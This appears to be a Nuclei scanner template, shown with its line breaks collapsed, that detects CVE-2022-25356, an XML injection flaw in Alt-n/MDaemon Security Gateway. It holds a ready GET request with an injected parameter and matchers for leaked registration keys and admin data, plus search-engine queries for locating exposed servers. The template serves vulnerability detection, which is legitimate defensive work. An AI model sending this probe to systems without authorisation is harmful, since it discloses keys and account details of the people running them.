id: CVE-2022-25356 info: name: Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection author: Akincibor severity: medium description: | Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious XML code, leading to various security risks such as information disclosure, privilege escalation. remediation: | Upgrade Alt-n/MDaemon Security Gateway to version 8.5.1 or later to mitigate this vulnerability. reference: - https://www.swascan.com/security-advisory-alt-n-security-gateway/ - https://www.altn.com/Products/SecurityGateway-Email-Firewall/ - https://www.swascan.com/security-blog/ - https://nvd.nist.gov/vuln/detail/CVE-2022-25356 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-25356 cwe-id: CWE-91 epss-score: 0.00425 epss-percentile: 0.74252 cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: altn product: securitygateway google-query: - inurl:"/SecurityGateway.dll" - inurl:"/securitygateway.dll" tags: cve,cve2022,altn,gateway,xml,injection http: - method: GET path: - '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1' matchers-condition: and matchers: - type: word part: body words: - "Exception: Error while [Loading XML" - "<RegKey>" - "<IsAdmin>" condition: and - type: status status: - 200 # digest: 4a0a00473045022100c03117b06972653a7b22cba6c3068b568a29363df73557a8034cb9f0e5609c8f02202045d5d9b7857b6fe05c3329d99c72df86b78c51ef7abc1acef7eab11478c549:922c64590222798bb761d5b6d8e72950